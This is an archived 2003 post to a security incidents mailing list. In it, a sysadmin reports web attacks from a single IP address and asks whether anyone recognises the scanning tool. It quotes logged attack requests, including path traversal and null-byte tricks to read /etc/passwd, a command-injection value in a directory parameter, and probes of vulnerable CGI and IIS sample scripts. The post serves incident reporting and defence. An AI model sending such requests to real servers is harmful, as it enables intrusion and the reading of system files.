Chinese source: some web attack tool
From: Paul (pbobby@stny.rr.com)
Date: 03/21/03
- Previous message: Kris Saw: "Re: Trojan attacking our switches"
- Next in thread: Tobias Lachmann: "AW: Chinese source: some web attack tool"
- Reply: Tobias Lachmann: "AW: Chinese source: some web attack tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 21 Mar 2003 22:14:50 -0000 From: Paul <pbobby@stny.rr.com> To: incidents@securityfocus.com('binary' encoding is not supported, stored as-is)
Getting hammered by a Chinese site, 218.88.98.237.
Anyone else?
They are web attacks, and here is a sample of the various attempts it
tries to make:
GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%
00 HTTP/1.0
GET /IISSamples/ExAir/search/query.asp HTTP/1.0
GET /cgi-bin/sh HTTP/1.0
GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0
GET /search.dll?search?query=%00&logic=AND HTTP/1.0
GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0
and so forth. Anyone recognize the tool?
----------------------------------------------------------------------------
<Pre>Lose another weekend managing your IDS?
Take back your personal time.
15-day free trial of StillSecure Border Guard.</Pre>
<A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>
- Previous message: Kris Saw: "Re: Trojan attacking our switches"
- Next in thread: Tobias Lachmann: "AW: Chinese source: some web attack tool"
- Reply: Tobias Lachmann: "AW: Chinese source: some web attack tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
